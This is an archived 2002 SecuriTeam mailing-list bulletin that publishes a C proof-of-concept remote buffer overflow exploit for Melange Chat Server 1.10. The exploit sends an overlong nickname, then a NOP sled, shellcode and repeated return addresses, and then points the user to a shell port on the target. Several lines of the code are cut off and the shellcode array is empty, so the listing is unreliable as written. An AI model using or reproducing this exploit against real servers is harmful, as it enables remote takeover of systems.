[EXPL] Melange Chat System Remote Exploit Code Released

From: support@securiteam.com
Date: 12/25/02

  • Next message: support@securiteam.com: "[UNIX] Integer Overflow in pdftops"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 25 Dec 2002 10:51:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Melange Chat System Remote Exploit Code Released


     <http://melange.terminal.at/> Christian Walter's Melange Chat System is a
    chat client/server that provides an easy way to set up your own, power
    full chat. A remotely exploitable buffer overflow in the product allows a
    remote attacker to completely compromise the server. The following is an
    exploit code that can be used to test your own system for the mentioned


       Proof of Concept for Melange Chat Server 1.10
       a lame remote bof exploit by innerphobia <up2u_@hotmail.com> 12/24/02

       Credits go to:
       - iDefense Labs for the advisory
       - blink for discovering the bug
       - Irian for the shellcode

       With careful calculation it is *possible* to control even the EIP,
       not just one byte of EIP.
       There are to a few things that will happen if we use a wrong ret
       1. Seg fault / shut down.
       2. Keep on going < nothing happens >.

       Code tested on Suse 8.0 and RH 7.3
       Merry Xmas :)

    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>

    // magic numbers begin here
    #define ADDR 0xbfffd490
    #define NICKLEN 49
    #define BUFFLEN 463
    // magic numbers end

    // brutally copied from Irian's cy.c
    char evil[]=

    int main(int argc,char **argv){
        int i,j=0,sock,port = 6666;
        char *host;
        char nick[NICKLEN],buff[BUFFLEN];
        struct hostent *htent;
        struct sockaddr_in serv_addr;
        long jump = ADDR;
        u_long *ptr = (u_long *)buff;

            printf("Usage : %s [hostname] [ret address in hex (0x41414141)]

        if(argc>2) sscanf(argv[2],"0x%lx",&jump);
        if(argc>3) port=atoi(argv[3]);

        if((htent = gethostbyname(argv[1])) != NULL && (sock =
    socket(AF_INET,SOCK_STREAM,0)) != -1){

            serv_addr.sin_family = AF_INET;
            serv_addr.sin_port = htons(port);

            if(!connect(sock,(struct sockaddr

                printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars


                memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);

                if(send(sock,nick,sizeof(nick),0) == -1)
                    perror("Sending nickname failed\n"),exit(1);

                for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
                for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
                for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];

                printf("Trying to send overflow string\n");

                if(send(sock,buff,sizeof(buff),0) == -1)
                    perror("Sending overflow failed :(\n"),exit(1);

                printf("Now try to connect to host : %s port : 26112\n",host);
            else printf("Can't connect to %s at %d\n",host,port),exit(1);


    The information has been provided by <mailto:up2u_@hotmail.com>


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.